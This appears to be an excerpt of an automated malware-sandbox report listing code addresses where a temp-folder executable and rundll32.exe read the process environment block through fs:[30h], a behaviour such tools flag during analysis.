Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013AB260 mov eax, dword ptr fs:[00000030h]	3_2_013AB260
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013AB260 mov eax, dword ptr fs:[00000030h]	3_2_013AB260
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C8A62 mov eax, dword ptr fs:[00000030h]	3_2_013C8A62
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013BEA55 mov eax, dword ptr fs:[00000030h]	3_2_013BEA55
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F9240 mov eax, dword ptr fs:[00000030h]	3_2_012F9240
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F9240 mov eax, dword ptr fs:[00000030h]	3_2_012F9240
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F9240 mov eax, dword ptr fs:[00000030h]	3_2_012F9240
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F9240 mov eax, dword ptr fs:[00000030h]	3_2_012F9240
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01384257 mov eax, dword ptr fs:[00000030h]	3_2_01384257
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0130AAB0 mov eax, dword ptr fs:[00000030h]	3_2_0130AAB0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0130AAB0 mov eax, dword ptr fs:[00000030h]	3_2_0130AAB0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132FAB0 mov eax, dword ptr fs:[00000030h]	3_2_0132FAB0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F52A5 mov eax, dword ptr fs:[00000030h]	3_2_012F52A5
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F52A5 mov eax, dword ptr fs:[00000030h]	3_2_012F52A5
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F52A5 mov eax, dword ptr fs:[00000030h]	3_2_012F52A5
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F52A5 mov eax, dword ptr fs:[00000030h]	3_2_012F52A5
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F52A5 mov eax, dword ptr fs:[00000030h]	3_2_012F52A5
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132D294 mov eax, dword ptr fs:[00000030h]	3_2_0132D294
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132D294 mov eax, dword ptr fs:[00000030h]	3_2_0132D294
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01322AE4 mov eax, dword ptr fs:[00000030h]	3_2_01322AE4
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01322ACB mov eax, dword ptr fs:[00000030h]	3_2_01322ACB
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0137A537 mov eax, dword ptr fs:[00000030h]	3_2_0137A537
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013BE539 mov eax, dword ptr fs:[00000030h]	3_2_013BE539
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01303D34 mov eax, dword ptr fs:[00000030h]	3_2_01303D34
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01303D34 mov eax, dword ptr fs:[00000030h]	3_2_01303D34
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01303D34 mov eax, dword ptr fs:[00000030h]	3_2_01303D34
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01303D34 mov eax, dword ptr fs:[00000030h]	3_2_01303D34
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01303D34 mov eax, dword ptr fs:[00000030h]	3_2_01303D34
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01303D34 mov eax, dword ptr fs:[00000030h]	3_2_01303D34
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01303D34 mov eax, dword ptr fs:[00000030h]	3_2_01303D34
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01303D34 mov eax, dword ptr fs:[00000030h]	3_2_01303D34
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01303D34 mov eax, dword ptr fs:[00000030h]	3_2_01303D34
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01303D34 mov eax, dword ptr fs:[00000030h]	3_2_01303D34
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01303D34 mov eax, dword ptr fs:[00000030h]	3_2_01303D34
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01303D34 mov eax, dword ptr fs:[00000030h]	3_2_01303D34
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01303D34 mov eax, dword ptr fs:[00000030h]	3_2_01303D34
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C8D34 mov eax, dword ptr fs:[00000030h]	3_2_013C8D34
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01324D3B mov eax, dword ptr fs:[00000030h]	3_2_01324D3B
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01324D3B mov eax, dword ptr fs:[00000030h]	3_2_01324D3B
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01324D3B mov eax, dword ptr fs:[00000030h]	3_2_01324D3B
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012FAD30 mov eax, dword ptr fs:[00000030h]	3_2_012FAD30
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0131C577 mov eax, dword ptr fs:[00000030h]	3_2_0131C577
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0131C577 mov eax, dword ptr fs:[00000030h]	3_2_0131C577
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01317D50 mov eax, dword ptr fs:[00000030h]	3_2_01317D50
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01333D43 mov eax, dword ptr fs:[00000030h]	3_2_01333D43
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01373540 mov eax, dword ptr fs:[00000030h]	3_2_01373540
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01321DB5 mov eax, dword ptr fs:[00000030h]	3_2_01321DB5
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01321DB5 mov eax, dword ptr fs:[00000030h]	3_2_01321DB5
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01321DB5 mov eax, dword ptr fs:[00000030h]	3_2_01321DB5
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C05AC mov eax, dword ptr fs:[00000030h]	3_2_013C05AC
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C05AC mov eax, dword ptr fs:[00000030h]	3_2_013C05AC
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013235A1 mov eax, dword ptr fs:[00000030h]	3_2_013235A1
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F2D8A mov eax, dword ptr fs:[00000030h]	3_2_012F2D8A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F2D8A mov eax, dword ptr fs:[00000030h]	3_2_012F2D8A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F2D8A mov eax, dword ptr fs:[00000030h]	3_2_012F2D8A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F2D8A mov eax, dword ptr fs:[00000030h]	3_2_012F2D8A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F2D8A mov eax, dword ptr fs:[00000030h]	3_2_012F2D8A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132FD9B mov eax, dword ptr fs:[00000030h]	3_2_0132FD9B
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132FD9B mov eax, dword ptr fs:[00000030h]	3_2_0132FD9B
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01322581 mov eax, dword ptr fs:[00000030h]	3_2_01322581
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01322581 mov eax, dword ptr fs:[00000030h]	3_2_01322581
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01322581 mov eax, dword ptr fs:[00000030h]	3_2_01322581
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01322581 mov eax, dword ptr fs:[00000030h]	3_2_01322581
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013A8DF1 mov eax, dword ptr fs:[00000030h]	3_2_013A8DF1
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0130D5E0 mov eax, dword ptr fs:[00000030h]	3_2_0130D5E0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0130D5E0 mov eax, dword ptr fs:[00000030h]	3_2_0130D5E0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013BFDE2 mov eax, dword ptr fs:[00000030h]	3_2_013BFDE2
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013BFDE2 mov eax, dword ptr fs:[00000030h]	3_2_013BFDE2
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013BFDE2 mov eax, dword ptr fs:[00000030h]	3_2_013BFDE2
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013BFDE2 mov eax, dword ptr fs:[00000030h]	3_2_013BFDE2
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01376DC9 mov eax, dword ptr fs:[00000030h]	3_2_01376DC9
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01376DC9 mov eax, dword ptr fs:[00000030h]	3_2_01376DC9
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01376DC9 mov eax, dword ptr fs:[00000030h]	3_2_01376DC9
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01376DC9 mov ecx, dword ptr fs:[00000030h]	3_2_01376DC9
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01376DC9 mov eax, dword ptr fs:[00000030h]	3_2_01376DC9
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01376DC9 mov eax, dword ptr fs:[00000030h]	3_2_01376DC9
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132BC2C mov eax, dword ptr fs:[00000030h]	3_2_0132BC2C
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C740D mov eax, dword ptr fs:[00000030h]	3_2_013C740D
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C740D mov eax, dword ptr fs:[00000030h]	3_2_013C740D
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C740D mov eax, dword ptr fs:[00000030h]	3_2_013C740D
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B1C06 mov eax, dword ptr fs:[00000030h]	3_2_013B1C06
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B1C06 mov eax, dword ptr fs:[00000030h]	3_2_013B1C06
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B1C06 mov eax, dword ptr fs:[00000030h]	3_2_013B1C06
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B1C06 mov eax, dword ptr fs:[00000030h]	3_2_013B1C06
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B1C06 mov eax, dword ptr fs:[00000030h]	3_2_013B1C06
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B1C06 mov eax, dword ptr fs:[00000030h]	3_2_013B1C06
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B1C06 mov eax, dword ptr fs:[00000030h]	3_2_013B1C06
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B1C06 mov eax, dword ptr fs:[00000030h]	3_2_013B1C06
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B1C06 mov eax, dword ptr fs:[00000030h]	3_2_013B1C06
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B1C06 mov eax, dword ptr fs:[00000030h]	3_2_013B1C06
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B1C06 mov eax, dword ptr fs:[00000030h]	3_2_013B1C06
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B1C06 mov eax, dword ptr fs:[00000030h]	3_2_013B1C06
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B1C06 mov eax, dword ptr fs:[00000030h]	3_2_013B1C06
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B1C06 mov eax, dword ptr fs:[00000030h]	3_2_013B1C06
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01376C0A mov eax, dword ptr fs:[00000030h]	3_2_01376C0A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01376C0A mov eax, dword ptr fs:[00000030h]	3_2_01376C0A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01376C0A mov eax, dword ptr fs:[00000030h]	3_2_01376C0A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01376C0A mov eax, dword ptr fs:[00000030h]	3_2_01376C0A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0131746D mov eax, dword ptr fs:[00000030h]	3_2_0131746D
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0138C450 mov eax, dword ptr fs:[00000030h]	3_2_0138C450
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0138C450 mov eax, dword ptr fs:[00000030h]	3_2_0138C450
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132A44B mov eax, dword ptr fs:[00000030h]	3_2_0132A44B
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0130849B mov eax, dword ptr fs:[00000030h]	3_2_0130849B
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B14FB mov eax, dword ptr fs:[00000030h]	3_2_013B14FB
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01376CF0 mov eax, dword ptr fs:[00000030h]	3_2_01376CF0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01376CF0 mov eax, dword ptr fs:[00000030h]	3_2_01376CF0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01376CF0 mov eax, dword ptr fs:[00000030h]	3_2_01376CF0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C8CD6 mov eax, dword ptr fs:[00000030h]	3_2_013C8CD6
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F4F2E mov eax, dword ptr fs:[00000030h]	3_2_012F4F2E
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F4F2E mov eax, dword ptr fs:[00000030h]	3_2_012F4F2E
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132E730 mov eax, dword ptr fs:[00000030h]	3_2_0132E730
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0131F716 mov eax, dword ptr fs:[00000030h]	3_2_0131F716
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0138FF10 mov eax, dword ptr fs:[00000030h]	3_2_0138FF10
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0138FF10 mov eax, dword ptr fs:[00000030h]	3_2_0138FF10
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C070D mov eax, dword ptr fs:[00000030h]	3_2_013C070D
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C070D mov eax, dword ptr fs:[00000030h]	3_2_013C070D
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132A70E mov eax, dword ptr fs:[00000030h]	3_2_0132A70E
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132A70E mov eax, dword ptr fs:[00000030h]	3_2_0132A70E
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0130FF60 mov eax, dword ptr fs:[00000030h]	3_2_0130FF60
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C8F6A mov eax, dword ptr fs:[00000030h]	3_2_013C8F6A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0130EF40 mov eax, dword ptr fs:[00000030h]	3_2_0130EF40
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01377794 mov eax, dword ptr fs:[00000030h]	3_2_01377794
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01377794 mov eax, dword ptr fs:[00000030h]	3_2_01377794
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01377794 mov eax, dword ptr fs:[00000030h]	3_2_01377794
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01308794 mov eax, dword ptr fs:[00000030h]	3_2_01308794
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013337F5 mov eax, dword ptr fs:[00000030h]	3_2_013337F5
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013AFE3F mov eax, dword ptr fs:[00000030h]	3_2_013AFE3F
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012FE620 mov eax, dword ptr fs:[00000030h]	3_2_012FE620
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132A61C mov eax, dword ptr fs:[00000030h]	3_2_0132A61C
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132A61C mov eax, dword ptr fs:[00000030h]	3_2_0132A61C
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012FC600 mov eax, dword ptr fs:[00000030h]	3_2_012FC600
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012FC600 mov eax, dword ptr fs:[00000030h]	3_2_012FC600
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012FC600 mov eax, dword ptr fs:[00000030h]	3_2_012FC600
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01328E00 mov eax, dword ptr fs:[00000030h]	3_2_01328E00
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B1608 mov eax, dword ptr fs:[00000030h]	3_2_013B1608
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0131AE73 mov eax, dword ptr fs:[00000030h]	3_2_0131AE73
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0131AE73 mov eax, dword ptr fs:[00000030h]	3_2_0131AE73
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0131AE73 mov eax, dword ptr fs:[00000030h]	3_2_0131AE73
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0131AE73 mov eax, dword ptr fs:[00000030h]	3_2_0131AE73
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0131AE73 mov eax, dword ptr fs:[00000030h]	3_2_0131AE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF6CF0 mov eax, dword ptr fs:[00000030h]	5_2_04FF6CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF6CF0 mov eax, dword ptr fs:[00000030h]	5_2_04FF6CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF6CF0 mov eax, dword ptr fs:[00000030h]	5_2_04FF6CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05048D34 mov eax, dword ptr fs:[00000030h]	5_2_05048D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0503E539 mov eax, dword ptr fs:[00000030h]	5_2_0503E539
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05023D40 mov eax, dword ptr fs:[00000030h]	5_2_05023D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F8849B mov eax, dword ptr fs:[00000030h]	5_2_04F8849B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F9746D mov eax, dword ptr fs:[00000030h]	5_2_04F9746D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_050405AC mov eax, dword ptr fs:[00000030h]	5_2_050405AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_050405AC mov eax, dword ptr fs:[00000030h]	5_2_050405AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FAA44B mov eax, dword ptr fs:[00000030h]	5_2_04FAA44B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FABC2C mov eax, dword ptr fs:[00000030h]	5_2_04FABC2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0503FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0503FDE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0503FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0503FDE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0503FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0503FDE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0503FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0503FDE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05028DF1 mov eax, dword ptr fs:[00000030h]	5_2_05028DF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF6C0A mov eax, dword ptr fs:[00000030h]	5_2_04FF6C0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF6C0A mov eax, dword ptr fs:[00000030h]	5_2_04FF6C0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF6C0A mov eax, dword ptr fs:[00000030h]	5_2_04FF6C0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF6C0A mov eax, dword ptr fs:[00000030h]	5_2_04FF6C0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05031C06 mov eax, dword ptr fs:[00000030h]	5_2_05031C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05031C06 mov eax, dword ptr fs:[00000030h]	5_2_05031C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05031C06 mov eax, dword ptr fs:[00000030h]	5_2_05031C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05031C06 mov eax, dword ptr fs:[00000030h]	5_2_05031C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05031C06 mov eax, dword ptr fs:[00000030h]	5_2_05031C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05031C06 mov eax, dword ptr fs:[00000030h]	5_2_05031C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05031C06 mov eax, dword ptr fs:[00000030h]	5_2_05031C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05031C06 mov eax, dword ptr fs:[00000030h]	5_2_05031C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05031C06 mov eax, dword ptr fs:[00000030h]	5_2_05031C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05031C06 mov eax, dword ptr fs:[00000030h]	5_2_05031C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05031C06 mov eax, dword ptr fs:[00000030h]	5_2_05031C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05031C06 mov eax, dword ptr fs:[00000030h]	5_2_05031C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05031C06 mov eax, dword ptr fs:[00000030h]	5_2_05031C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05031C06 mov eax, dword ptr fs:[00000030h]	5_2_05031C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0504740D mov eax, dword ptr fs:[00000030h]	5_2_0504740D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0504740D mov eax, dword ptr fs:[00000030h]	5_2_0504740D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0504740D mov eax, dword ptr fs:[00000030h]	5_2_0504740D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F8D5E0 mov eax, dword ptr fs:[00000030h]	5_2_04F8D5E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F8D5E0 mov eax, dword ptr fs:[00000030h]	5_2_04F8D5E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF6DC9 mov eax, dword ptr fs:[00000030h]	5_2_04FF6DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF6DC9 mov eax, dword ptr fs:[00000030h]	5_2_04FF6DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF6DC9 mov eax, dword ptr fs:[00000030h]	5_2_04FF6DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF6DC9 mov ecx, dword ptr fs:[00000030h]	5_2_04FF6DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF6DC9 mov eax, dword ptr fs:[00000030h]	5_2_04FF6DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FF6DC9 mov eax, dword ptr fs:[00000030h]	5_2_04FF6DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA1DB5 mov eax, dword ptr fs:[00000030h]	5_2_04FA1DB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA1DB5 mov eax, dword ptr fs:[00000030h]	5_2_04FA1DB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA1DB5 mov eax, dword ptr fs:[00000030h]	5_2_04FA1DB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0500C450 mov eax, dword ptr fs:[00000030h]	5_2_0500C450
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0500C450 mov eax, dword ptr fs:[00000030h]	5_2_0500C450
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA35A1 mov eax, dword ptr fs:[00000030h]	5_2_04FA35A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FAFD9B mov eax, dword ptr fs:[00000030h]	5_2_04FAFD9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FAFD9B mov eax, dword ptr fs:[00000030h]	5_2_04FAFD9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA2581 mov eax, dword ptr fs:[00000030h]	5_2_04FA2581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA2581 mov eax, dword ptr fs:[00000030h]	5_2_04FA2581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA2581 mov eax, dword ptr fs:[00000030h]	5_2_04FA2581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA2581 mov eax, dword ptr fs:[00000030h]	5_2_04FA2581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F72D8A mov eax, dword ptr fs:[00000030h]	5_2_04F72D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F72D8A mov eax, dword ptr fs:[00000030h]	5_2_04F72D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F72D8A mov eax, dword ptr fs:[00000030h]	5_2_04F72D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F72D8A mov eax, dword ptr fs:[00000030h]	5_2_04F72D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F72D8A mov eax, dword ptr fs:[00000030h]	5_2_04F72D8A
